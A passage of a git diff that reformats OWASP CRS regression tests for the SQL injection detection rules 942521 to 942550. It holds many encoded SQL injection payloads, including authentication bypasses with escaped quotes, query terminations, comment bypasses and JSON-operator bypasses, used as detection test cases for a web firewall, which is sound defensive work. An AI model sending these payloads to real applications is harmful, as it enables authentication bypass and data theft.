text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942521" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml index c692b1f97..31a358005 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml @@ -2,162 +2,152 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.1/4" - enabled: true - name: 942522.yaml +rule_id: 942522 tests: - - test_title: 942522-1 + - test_id: 1 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \'or'1 - data: "var=%5C'or'1" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \'or'1 + data: "var=%5C'or'1" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_id: 2 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \"or"1 - data: "var=%5C%22or%221" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \"or"1 + data: "var=%5C%22or%221" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_id: 3 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \`or`1 - data: "var=%5C%60or%601" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \`or`1 + data: "var=%5C%60or%601" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_id: 4 desc: "Blocks bypass with: \\'and" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C'and" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C'and" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_id: 5 desc: "Negative test: doesn't block normal SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='or'1" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='or'1" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_id: 6 desc: "Negative test: doesn't block escaped quotes without following (and|or)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C' foo or" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C' foo or" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_id: 7 desc: "New line bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=newline%0A%5C' and 1" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=newline%0A%5C' and 1" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_id: 8 desc: "Negative test: Wikipedia article about SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_id: 9 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" - version: HTTP/1.0 - output: - log_contains: id "942522" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log_contains: id "942522" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml index eb9af879b..728516d9a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml @@ -2,23 +2,21 @@ meta: author: "Franziska Bühler, azurit" description: "Detects SQL query termination" - enabled: true - name: 942530.yaml +rule_id: 942530 tests: - - test_title: 942530-1 + - test_id: 1 desc: "Detects SQL query termination with ';" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin@juice-sh.op';&password=foo" - version: HTTP/1.0 - output: - log_contains: id "942530" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin@juice-sh.op';&password=foo" + version: HTTP/1.0 + output: + log_contains: id "942530" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml index 97d543f83..0fce21551 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml @@ -2,135 +2,127 @@ meta: author: "karelorigin, Walter Hop, azurit" description: Various Authentication bypass tests - enabled: true - name: 942540.yaml +rule_id: 942540 tests: - - test_title: 942540-1 + - test_id: 1 desc: "Positive test for single quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op';" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op';" + version: HTTP/1.0 + output: + log_contains: id "942540" + - test_id: 2 desc: "Positive test for double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op\";" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op\";" + version: HTTP/1.0 + output: + log_contains: id "942540" + - test_id: 3 desc: "Positive test for backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op`;" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op`;" + version: HTTP/1.0 + output: + log_contains: id "942540" + - test_id: 4 desc: "False positive test CSV balanced single quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='foo';'bar';'def'" - version: HTTP/1.0 - output: - no_log_contains: id "942540" - - test_title: 942540-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='foo';'bar';'def'" + version: HTTP/1.0 + output: + no_log_contains: id "942540" + - test_id: 5 desc: "False positive test balanced backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=`foo`;`bar`;`def`" - version: HTTP/1.0 - output: - no_log_contains: id "942540" - - test_title: 942540-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=`foo`;`bar`;`def`" + version: HTTP/1.0 + output: + no_log_contains: id "942540" + - test_id: 6 desc: "False positive test (markdown) mixed and balanced quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Content-Type: "multipart/form-data; boundary=--------397236876" - method: POST - port: 80 - uri: "/post" - data: | - ----------397236876 - Content-Disposition: form-data; name="document"; filename="document.md" - Content-Type: text/markdown + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: "multipart/form-data; boundary=--------397236876" + method: POST + port: 80 + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="document"; filename="document.md" + Content-Type: text/markdown - # Foo - my name is 'foo'; and I work on CRS. - # Bar - my name is "bar"; and I work on CRS. - ----------397236876-- - version: "HTTP/1.1" - output: - no_log_contains: id "942540" - - test_title: 942540-7 + # Foo + my name is 'foo'; and I work on CRS. + # Bar + my name is "bar"; and I work on CRS. + ----------397236876-- + version: "HTTP/1.1" + output: + no_log_contains: id "942540" + - test_id: 7 desc: "Test for bypass with comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" - version: HTTP/1.0 - output: - log_contains: id "942540" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" + version: HTTP/1.0 + output: + log_contains: id "942540" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml index f063ea0ed..32b9038b5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml @@ -2,672 +2,635 @@ meta: author: "Andrea Menin (theMiddle), azurit" description: JSON in SQL bypass technique - enabled: true - name: 942550.yaml +rule_id: 942550 tests: - - test_title: 942550-1 + - test_id: 1 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 2 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 3 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 4 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 5 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 6 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 